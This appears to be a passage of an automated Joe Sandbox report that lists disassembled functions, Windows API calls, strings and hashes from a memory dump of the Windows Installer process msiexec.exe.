AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3428
FreeSid.ADVAPI32(?), ref: 003F3446
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3468
FreeSid.ADVAPI32(?), ref: 003F34A2
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F34C0
FreeSid.ADVAPI32(?), ref: 003F34DE
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3500
FreeSid.ADVAPI32(?), ref: 003F3548
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3566
FreeSid.ADVAPI32(?), ref: 003F3584
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F35A6
FreeSid.ADVAPI32(?), ref: 003F35C4
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000004,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F35E2
FreeSid.ADVAPI32(?), ref: 003F3628
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3646
FreeSid.ADVAPI32(?), ref: 003F3664
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3686
FreeSid.ADVAPI32(?), ref: 003F36AE
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F36CC
FreeSid.ADVAPI32(?), ref: 003F36EA
AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3707
FreeSid.ADVAPI32(?), ref: 003F3725
AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 003F3747
GetLengthSid.ADVAPI32(?), ref: 003F37A0
memset.MSVCRT ref: 003F37C5
GlobalAlloc.KERNEL32(00000000,?), ref: 003F37E8
InitializeAcl.ADVAPI32(?,?,00000002), ref: 003F3816
AddAccessAllowedAce.ADVAPI32(?,00000002,?,?), ref: 003F3842
GetAce.ADVAPI32(?,?,?), ref: 003F385D
InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 003F3887
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003F389D
SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 003F38AE
SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 003F38C7
GetSecurityDescriptorLength.ADVAPI32(?), ref: 003F38D6
MakeSelfRelativeSD.ADVAPI32(?,?,?), ref: 003F38F3
GetLastError.KERNEL32 ref: 003F38FD
GlobalFree.KERNEL32(?), ref: 003F3918
GetLastError.KERNEL32 ref: 003F3920
FreeSid.ADVAPI32(?), ref: 003F393D

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: FreeInitialize$Allocate$DescriptorSecurity$ErrorGlobalLastLength$AccessAllocAllowedDaclGroupMakeOwnerRelativeSelfmemset
String ID:
API String ID: 3802846876-0
Opcode ID: 864a7c8d380aaa3c93168ffde87d92440aa92ce974ae5850a7adb6af8d1cfd95
Instruction ID: 3d9810804c88d8480317ddb36c33b12c9c345e6d4a612ff077c74d82f72daa1b
Opcode Fuzzy Hash: 864a7c8d380aaa3c93168ffde87d92440aa92ce974ae5850a7adb6af8d1cfd95
Instruction Fuzzy Hash: B512177150834AAFDB229F60DC8CBBBB7EDEB84741F10482DB689C6260DB71D905CB12

Function 003F5C84 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 189libraryfilestringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 003F5CAD
GetACP.KERNEL32(00000641,?,00000000), ref: 003F5CE3
LoadLibraryW.KERNEL32(KERNEL32), ref: 003F5CF0
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 003F5D02
GetLocaleInfoW.KERNEL32(?,20001004,?,0000000A), ref: 003F5D38
FreeLibrary.KERNEL32(00000000), ref: 003F5D46
FormatMessageW.KERNEL32(00001000,00000000,00000641,?,?,00000401,00000000), ref: 003F5D6C
memset.MSVCRT ref: 003F5DEE
GetVersionExW.KERNEL32(0000011C), ref: 003F5E07

Part of subcall function 003F2E35: _vsnwprintf.MSVCRT ref: 003F2E67

lstrlenW.KERNEL32(?), ref: 003F5E96
WriteFile.KERNEL32(?,00000000,?,00000000), ref: 003F5EB4
WriteFile.KERNEL32(003F2638,00000004,?,00000000), ref: 003F5ECF

Strings

GetUserDefaultUILanguage, xrefs: 003F5CFC
Install error %i, xrefs: 003F5D95
KERNEL32, xrefs: 003F5CE9

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: FileLibraryWritememset$AddressFormatFreeInfoLoadLocaleMessageProcVersion_vsnwprintflstrlen
String ID: GetUserDefaultUILanguage$Install error %i$KERNEL32
API String ID: 2411759445-2065445882
Opcode ID: b07a4a885578cd70c18106c728c7d4241fc68ba2e623e7a043fb5c91a72d6f25
Instruction ID: ac2a15d60a17303734bee39f4411b76d6d76b2e3b2bcd1beab3cac1856fb10a5
Opcode Fuzzy Hash: b07a4a885578cd70c18106c728c7d4241fc68ba2e623e7a043fb5c91a72d6f25
Instruction Fuzzy Hash: F951AFB190121DABEB129B60DC89EFB77ADFB08364F140165F709E6191EB71DE44CBA0

Function 003F30F2 Relevance: 10.6, APIs: 7, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?), ref: 003F3133
GetLastError.KERNEL32(?,?), ref: 003F313D
GetLengthSid.ADVAPI32(?,?,?), ref: 003F3148
FreeSid.ADVAPI32(00000000), ref: 003F315E

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AllocateErrorFreeInitializeLastLength
String ID:
API String ID: 1611457584-0
Opcode ID: 5a8219286e5b83a7fcfea39e742c16c37821d2ce91f85beddeddea8ab0e0819c
Instruction ID: 4e732423488ade7836471973ee682365268147a13016ce8195f18f1cf194c979
Opcode Fuzzy Hash: 5a8219286e5b83a7fcfea39e742c16c37821d2ce91f85beddeddea8ab0e0819c
Instruction Fuzzy Hash: 92114F7091520EEFDB12ABA4DD0DBBEBB7DFB08305F01446AF616A21A0DB719A44DB05

Function 003F9E35 Relevance: 7.6, APIs: 5, Instructions: 50timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003F9E62
GetCurrentProcessId.KERNEL32 ref: 003F9E71
GetCurrentThreadId.KERNEL32 ref: 003F9E7A
GetTickCount.KERNEL32 ref: 003F9E83
QueryPerformanceCounter.KERNEL32(?), ref: 003F9E98

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 17eeedb68e856af1d8a63971dbf4420330cafa1f52e2eeac4aea545e4d9d58a9
Instruction ID: d65c9cbeb4ef62622acfa3136e5bab1c6bfba366aae458fcb0eb9dc2e44a74f2
Opcode Fuzzy Hash: 17eeedb68e856af1d8a63971dbf4420330cafa1f52e2eeac4aea545e4d9d58a9
Instruction Fuzzy Hash: 8711F571D11208EBCB12DBB8DA48BAEB7F9BB58314F51486AD406E7310EB30DA00CB40

Function 003F8A55 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52librarysleeploaderCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(0000000A), ref: 003F8A77
LoadLibraryW.KERNEL32(COMCTL32), ref: 003F8AA1
GetProcAddress.KERNEL32(?), ref: 003F8AC1

Strings

COMCTL32, xrefs: 003F8A9C

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: AddressLibraryLoadProcSleep
String ID: COMCTL32
API String ID: 188063004-3719691325
Opcode ID: ad9bd6d79eacee95c1ce0908f858184d676b929f589fcb1ffa2a29e65f29a19e
Instruction ID: 8034622e14e9606093cca3d9f00478edb6d012eabc2afd179b3256d7ed9f5a2a
Opcode Fuzzy Hash: ad9bd6d79eacee95c1ce0908f858184d676b929f589fcb1ffa2a29e65f29a19e
Instruction Fuzzy Hash: 3401B132654259AFDB1BDB399D1D63A7AADEB82350F09043EE601C7250EE70DC01CBA0

Function 003F9C10 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(003F9BC0), ref: 003F9C15

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 2fa02dc0cb9a55ecc0e249005a6bcb081aaefe381327d65337e86c430f6b3fbb
Instruction ID: 641e92b26d76ec146a1707f348d8d8c9496ad2a5fd55da097864c28ebba3c776
Opcode Fuzzy Hash: 2fa02dc0cb9a55ecc0e249005a6bcb081aaefe381327d65337e86c430f6b3fbb
Instruction Fuzzy Hash: F39002A0251544464A4227706C1D76527955B48716B410452E101C4254DB544540D911

Function 003F7EB0 Relevance: 88.0, APIs: 40, Strings: 10, Instructions: 481windowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 003F3C24: EnterCriticalSection.KERNEL32(003FC838,?,?,?,003F3C1E,00000000,00000000), ref: 003F3C31
Part of subcall function 003F3C24: LeaveCriticalSection.KERNEL32(003FC838,?,?,?,003F3C1E,00000000,00000000), ref: 003F3CDF

RegOpenKeyExW.ADVAPI32(80000000,CLSID,00000000,00020019,?,00000002,00000000,00007530), ref: 003F7EFB
RegCloseKey.ADVAPI32(?), ref: 003F7F0B

Part of subcall function 003F8745: GlobalAlloc.KERNEL32(00000000,?,00000000,?,003F7F98,00000200), ref: 003F875F

Part of subcall function 003F8745: memset.MSVCRT ref: 003F8778

CoUninitialize.OLE32 ref: 003F7F5B
MakeAbsoluteSD.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000200), ref: 003F8058
CoUninitialize.OLE32 ref: 003F8066
GetLastError.KERNEL32 ref: 003F806C
GetLastError.KERNEL32(00000000), ref: 003F80AC
CoUninitialize.OLE32(00000002,00000000,00007530), ref: 003F80C2
InitializeCriticalSection.KERNEL32(003FC488,00000002,00000000,00007530), ref: 003F81D2
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003F81F5
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 003F8204
GetLastError.KERNEL32 ref: 003F8246
GetLastError.KERNEL32 ref: 003F8276
CoRegisterClassObject.OLE32(003F25E0,?,00000015,00000001,?,00000002,00000000,00007530), ref: 003F82C0
MsgWaitForMultipleObjects.USER32(00000003,?,00000000,000000FF,00001CFF), ref: 003F8343
TranslateMessage.USER32(?), ref: 003F8375
DispatchMessageW.USER32(?), ref: 003F8382
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003F8394
GetLastError.KERNEL32 ref: 003F83C6
GetLastError.KERNEL32 ref: 003F83CC
GetLastError.KERNEL32(00000000), ref: 003F841B
EnterCriticalSection.KERNEL32(003FC488,00000001,00000000), ref: 003F843C
CloseHandle.KERNEL32 ref: 003F8448
LeaveCriticalSection.KERNEL32(003FC488), ref: 003F8459
EnterCriticalSection.KERNEL32(003FC488,00000001,00000000), ref: 003F846C
CloseHandle.KERNEL32 ref: 003F8478
LeaveCriticalSection.KERNEL32(003FC488), ref: 003F8489
EnterCriticalSection.KERNEL32(003FC488,00000001,00000000), ref: 003F849C
CloseHandle.KERNEL32 ref: 003F84A8
LeaveCriticalSection.KERNEL32(003FC488), ref: 003F84B9
CoUninitialize.OLE32(00000001,00000000), ref: 003F84C3
DeleteCriticalSection.KERNEL32(003FC488,00000001,00000000), ref: 003F84E0
CoUninitialize.OLE32(?,?,?,?,00000200), ref: 003F84EC
GlobalFree.KERNEL32(?), ref: 003F850D
GlobalFree.KERNEL32(?), ref: 003F8526
GlobalFree.KERNEL32(?), ref: 003F853F
GlobalFree.KERNEL32(?), ref: 003F8558
GlobalFree.KERNEL32(?), ref: 003F8571

Strings

ServiceThreadMain: CreateSD for CreateWaitableTimer failed., xrefs: 003F81B1
ServiceThreadMain: SetWaitableTimer failed., xrefs: 003F827C
CLSID, xrefs: 003F7EF1
Set of COMGLB_UNMARSHALING_POLICY failed., xrefs: 003F8163
ServiceThreadMain: CreateEvent failed., xrefs: 003F840D
Wait Failed in MsgWait., xrefs: 003F83D4
CoCreateInstance of CLSID_GlobalOptions failed., xrefs: 003F8105
ServiceThreadMain: CreateWaitableTimer failed., xrefs: 003F824C
ServiceThreadMain: Class registration failed, xrefs: 003F8400
ServiceThreadMain: CoInitializeSecurity failed, xrefs: 003F80A0

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: CriticalSection$ErrorLast$Global$FreeUninitialize$CloseEnterLeave$HandleMessage$CreateEvent$AbsoluteAllocClassDeleteDispatchInitializeMakeMultipleObjectObjectsOpenPeekRegisterTranslateWaitmemset
String ID: CLSID$CoCreateInstance of CLSID_GlobalOptions failed.$ServiceThreadMain: Class registration failed$ServiceThreadMain: CoInitializeSecurity failed$ServiceThreadMain: CreateEvent failed.$ServiceThreadMain: CreateSD for CreateWaitableTimer failed.$ServiceThreadMain: CreateWaitableTimer failed.$ServiceThreadMain: SetWaitableTimer failed.$Set of COMGLB_UNMARSHALING_POLICY failed.$Wait Failed in MsgWait.
API String ID: 535215923-1806920385
Opcode ID: 0d2724d5b19bb0b41712d2d3c54332f952c0cf0e1e2ad97f1d0cf298bfdf53e1
Instruction ID: 048df79f75c23510a54ed8239982690759c7afb7ee030e1fe04d9cdbb31bc81e
Opcode Fuzzy Hash: 0d2724d5b19bb0b41712d2d3c54332f952c0cf0e1e2ad97f1d0cf298bfdf53e1
Instruction Fuzzy Hash: 8602A37490022EEFEB2B9B64DD89EBA77ADEB04704F004199E709A61A0DF709D85CF50

Function 003F8F66 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,OLEAUT32.dll,0000005C,?,?,003F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003F90C6,0000020A,?), ref: 003F8F8C
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003F8F9F
GetLastError.KERNEL32(?,003F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003F90C6,0000020A,?), ref: 003F8FAB
FreeLibrary.KERNEL32(00000000,?,003F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003F90C6,0000020A,?), ref: 003F8FE0
SetLastError.KERNEL32(00000000,?,003F9046,OLEAUT32.dll,00000000,OLEAUT32.dll,00000000,003F90C6,0000020A,?), ref: 003F8FE7
GetSystemDirectoryW.KERNEL32(?,00000105), ref: 003F8FF8

Strings

OLEAUT32.dll, xrefs: 003F8F6D
GetSystemWow64DirectoryW, xrefs: 003F8F99
kernel32.dll, xrefs: 003F8F87

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: ErrorLastLibrary$AddressDirectoryFreeLoadProcSystem
String ID: GetSystemWow64DirectoryW$OLEAUT32.dll$kernel32.dll
API String ID: 1648426049-138662608
Opcode ID: e9cff61a26673fd58e4ccf9a25b1ebb9a61705f1dcbff22ce97d2a9022a72f88
Instruction ID: 63d4170ec4654d9df3ba6871516c0afb335cc7c60e22c3cdb95992513e3eba5a
Opcode Fuzzy Hash: e9cff61a26673fd58e4ccf9a25b1ebb9a61705f1dcbff22ce97d2a9022a72f88
Instruction Fuzzy Hash: A501B13664471AAFD71B6768BD0CA7B7AAFEB84355F160025F702D2260EEB0CC01D654

Function 003F5441 Relevance: 16.6, APIs: 11, Instructions: 127librarystringloaderCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 003F5475

Part of subcall function 003F8665: GlobalAlloc.KERNEL32(00000040,?,00000020,-00000002,00000000,?,003F66E9,?,?,?), ref: 003F8680

CoInitialize.OLE32(00000000), ref: 003F54EB
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 003F54FF
SetCurrentDirectoryW.KERNEL32(?,?,00000000,00000008), ref: 003F5511
GetLastError.KERNEL32(?,00000000,00000008), ref: 003F551B
SetThreadToken.ADVAPI32(00000000,00000000,?,00000000,00000008), ref: 003F5534
GetLastError.KERNEL32(?,00000000,00000008), ref: 003F553E
GetProcAddress.KERNEL32(00000000), ref: 003F5559
GetLastError.KERNEL32(?,?,00000000,00000008), ref: 003F5565
FreeLibrary.KERNEL32(00000000,?,00000000,00000008), ref: 003F558D
CoUninitialize.OLE32(?,00000000,00000008), ref: 003F5593

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: ErrorLast$Library$AddressAllocCurrentDirectoryFreeGlobalInitializeLoadProcThreadTokenUninitializelstrlen
String ID:
API String ID: 1429436423-0
Opcode ID: 0cfaed9c26f53f31bf83f5320f7e99993d1f01303ffbd4175ed5baf7c3ebe696
Instruction ID: 68d12ad8dfdb7f646d06b032bb3870ee98cbf7c0ec88cb5c34c68313c319990d
Opcode Fuzzy Hash: 0cfaed9c26f53f31bf83f5320f7e99993d1f01303ffbd4175ed5baf7c3ebe696
Instruction Fuzzy Hash: 2541F232A4093D5BC7235B289C487BE726AAF95751F020169EF4BEB260DF34CD4186D0

Function 003F90E9 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 44COMMON

Download Yara Rule

Strings

ResolveDelayLoadedAPI, xrefs: 003F9123
KERNEL32.DLL, xrefs: 003F9113
ResolveDelayLoadsFromDll, xrefs: 003F9137
api-ms-win-core-delayload-l1-1-1.dll, xrefs: 003F9103

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID:
String ID: KERNEL32.DLL$ResolveDelayLoadedAPI$ResolveDelayLoadsFromDll$api-ms-win-core-delayload-l1-1-1.dll
API String ID: 0-3594434003
Opcode ID: 202d6e834d060c147857687ffd747a5447108166f342fa3d09873ef2f40634f2
Instruction ID: b1a267b3647622ed829d4e88f0773f6469ddaf2e80391c0643b823699dd0a348
Opcode Fuzzy Hash: 202d6e834d060c147857687ffd747a5447108166f342fa3d09873ef2f40634f2
Instruction Fuzzy Hash: 81F0B4625C273FB64B336AA95C92FFB66495906BD13031677FB00EB154DB14CC40C790

Function 003F7E20 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registrythreadCOMMON

Download Yara Rule

APIs

RegisterServiceCtrlHandlerW.ADVAPI32(MSIServer,Function_000085A0), ref: 003F7E2A
GetLastError.KERNEL32 ref: 003F7E39

Part of subcall function 003F59F2: GetLastError.KERNEL32(00000020,00000000,00000000), ref: 003F5A12
Part of subcall function 003F59F2: RegQueryValueExW.ADVAPI32(?,Debug,00000000,00000000,?,?), ref: 003F5A8A
Part of subcall function 003F59F2: RegCloseKey.ADVAPI32(?), ref: 003F5AAA
Part of subcall function 003F59F2: GlobalFree.KERNEL32(?), ref: 003F5ABF
Part of subcall function 003F59F2: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Installer\CA,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 003F5B14
Part of subcall function 003F59F2: RegSetValueExW.ADVAPI32(?,LastError,00000000,00000004,?,00000004), ref: 003F5B35
Part of subcall function 003F59F2: lstrlenW.KERNEL32(ServerMain (CA): Open synchronization event failed), ref: 003F5B3C
Part of subcall function 003F59F2: RegSetValueExW.ADVAPI32(?,LastErrorMessage,00000000,00000001,ServerMain (CA): Open synchronization event failed,00000000), ref: 003F5B59
Part of subcall function 003F59F2: RegCloseKey.ADVAPI32(?), ref: 003F5B65

CreateThread.KERNEL32(00000000,00000000,Function_00007EB0,00000000,00000000,003FC6A8), ref: 003F7E72
GetLastError.KERNEL32(00007530), ref: 003F7E80

Strings

RegisterServiceCtrlHandler failed., xrefs: 003F7E41
MSIServer, xrefs: 003F7E25

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: ErrorLastValue$CloseCreate$CtrlFreeGlobalHandlerQueryRegisterServiceThreadlstrlen
String ID: MSIServer$RegisterServiceCtrlHandler failed.
API String ID: 1878216277-870239898
Opcode ID: affbcbe6ab1c1cfed8584eecca907d4a84bc90463d882caac493b4ed64a7c641
Instruction ID: 6782c10f7371ea06204dcb38b256acb12e95c8e6a3a41d143872b05da3f87fd3
Opcode Fuzzy Hash: affbcbe6ab1c1cfed8584eecca907d4a84bc90463d882caac493b4ed64a7c641
Instruction Fuzzy Hash: 5701F93164922EBBD3235766AD0DDBB3E9DDB95761F000153FB09D1190DE60CC02C6B1

Function 003F9330 Relevance: 12.1, APIs: 8, Instructions: 146sleepCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32(?,003FA310,00000058), ref: 003F934F
Sleep.KERNEL32(000003E8), ref: 003F9384
_amsg_exit.MSVCRT ref: 003F9399
_initterm.MSVCRT ref: 003F93ED
__IsNonwritableInCurrentImage.LIBCMT ref: 003F9419
exit.MSVCRT ref: 003F948F
_ismbblead.MSVCRT ref: 003F94AA

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 359039474-0
Opcode ID: 69b579f5329b0dc0dba9242ee6b3f1ab413c8ca6302276093034962a01a8b51f
Instruction ID: 0b363d148e5ecf3c07287d961ec0e2378e82d21fc3946e47a5ab200e4421ac6e
Opcode Fuzzy Hash: 69b579f5329b0dc0dba9242ee6b3f1ab413c8ca6302276093034962a01a8b51f
Instruction Fuzzy Hash: 6C41D37598431DCFDB23DF95EA157BAB7A9EB58720F21001BEB4197290CB748802CB80

Function 003F4CEC Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 131stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 003F4D61
lstrlenW.KERNEL32(?), ref: 003F4D6A
lstrlenW.KERNEL32(003FC8C0), ref: 003F4D78
lstrlenW.KERNEL32(?), ref: 003F4D84
lstrlenW.KERNEL32 ref: 003F4DFA
lstrlenW.KERNEL32(?), ref: 003F4E03

Strings

MSIINSTANCEGUID=, xrefs: 003F4D51

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: lstrlen
String ID: MSIINSTANCEGUID=
API String ID: 1659193697-2015669138
Opcode ID: 22fe5cb3c487b3bf3582771bfdb2bba2a2990311ba49ae7514ed49434ddd814a
Instruction ID: 3c4e9c227c2f528a89a859098fe89170a5b708f3fc61f466ed347bbe9b6b41a7
Opcode Fuzzy Hash: 22fe5cb3c487b3bf3582771bfdb2bba2a2990311ba49ae7514ed49434ddd814a
Instruction Fuzzy Hash: E1418D76A0021DDBC713AB70EC48BBBB7A9BB44314F140164EB05E72A1EF349D41CB54

Function 003F5070 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 214COMMON

Download Yara Rule

Strings

rpoedcamusv, xrefs: 003F5286
PECMS, xrefs: 003F5146
REINSTALL=ALL REINSTALLMODE=%s, xrefs: 003F514C
PackageCode, xrefs: 003F520E

Memory Dump Source

Source File: 0000000B.00000002.3822685134.00000000003F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 003F0000, based on PE: true

Associated: 0000000B.00000002.3822685134.00000000003FD000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000B.00000002.3822790786.00000000003FF000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3f0000_msiexec.jbxd

Similarity

API ID: lstrlen
String ID: PECMS$PackageCode$REINSTALL=ALL REINSTALLMODE=%s$rpoedcamusv
API String ID: 1659193697-1647986965
Opcode ID: 525e15f752ae20c4d30de83e858a2a22503a0ae961bbed057884fb0b050cb481
Instruction ID: 0faf3952d47fe3077348fb5802c901638451040fe917b451fb7c0afd6729864f
Opcode Fuzzy Hash: 525e15f752ae20c4d30de83e858a2a22503a0ae961bbed057884fb0b050cb481
Instruction Fuzzy Hash: 8361C47260874AABD732DF64E855BBB73E8EB94350F10492AFB45CB280EB70D904C791

